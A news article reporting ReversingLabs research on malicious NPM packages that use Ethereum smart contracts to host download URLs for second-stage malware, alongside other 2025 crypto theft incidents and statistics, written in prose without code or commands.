Hackers are increasingly targeting vulnerabilities in widely-used Node Package Manager (NPM) coding libraries to inject malware into Ethereum smart contracts, according to recent research by cryptocurrency compliance firm Reversing Labs. In a blog post on September 3, researcher Lucija Valentić highlighted the discovery of new forms of malware, notably the packages “colortoolsv2” and “mimelib2.” These packages, released in July 2025, exploit smart contracts, embedding harmful commands designed to install downloader malware on compromised systems.
The attack vectors are part of a growing trend where malicious supply chain actors leverage sophisticated social engineering techniques to persuade developers into incorporating harmful code into their projects. Reversing Labs noted that 2025 has seen a diverse array of campaigns targeting NPM, the primary online repository for JavaScript packages. For instance, in March, they documented the emergence of packages labeled ethers-provider2 and ethers-providerz, which are part of a larger cluster of infostealers and other malicious tools identified on NPM.
In July, researcher Karlo Zanki uncovered a campaign utilizing a basic package designed to deploy blockchain functionality in a novel way, facilitating the malicious second stage. One significant finding was the colortoolsv2 package, identified as an infiltrator of Ethereum smart contracts. This seemingly simple NPM package actually conceals a hidden malicious payload within a script named index.js. Upon installation, this script fetches blockchain data and executes harmful commands by connecting to a command and control (C2) server, ultimately downloading additional malicious software.
What makes this method particularly concerning is the unusual use of Ethereum smart contracts to host the actual URLs for downloading this second-stage malware. Researchers have pointed out that they haven’t encountered such a tactic previously.
In a striking example, the researchers discovered a version of a Solana trading bot infected by the colortoolsv2 package, which appeared legitimate on the surface. This repository showcased thousands of commits, numerous contributors, and a significant volume of user engagement—all characteristics that would typically signal a trustworthy open-source project. However, the details were fabricated, and any developer installing this bot risked having their user wallets drained.
The rise of software supply chain attacks on smart contracts and blockchain infrastructure has been alarming. In July, a vulnerability in Arcadia Finance’s Rebalancer contract allowed hackers to drain approximately $2.5 million in cryptocurrency from the platform operating on the Base blockchain. By manipulating arbitrary parameters for swaps, the attackers executed unauthorized transactions that emptied user vaults.
Blockchain analytics firm Global Ledger revealed a staggering statistic: hackers have stolen an estimated $3 billion worth of cryptocurrency across 119 separate incidents in the first half of 2025 alone, marking a 150% increase over the total thefts recorded in all of 2024. Slava Demchuk, CEO of analytics firm AMLBot, emphasized that access-control flaws and vulnerabilities in smart contracts, particularly in bridges, have become frequent targets for exploitation.
As the situation intensifies, blockchain auditors recommend that developers rigorously assess each library before integrating it into their projects to mitigate potential threats effectively. This heightened scrutiny is essential in the evolving landscape of decentralized finance (DeFi), where interconnected protocols amplify the risk of security breaches.
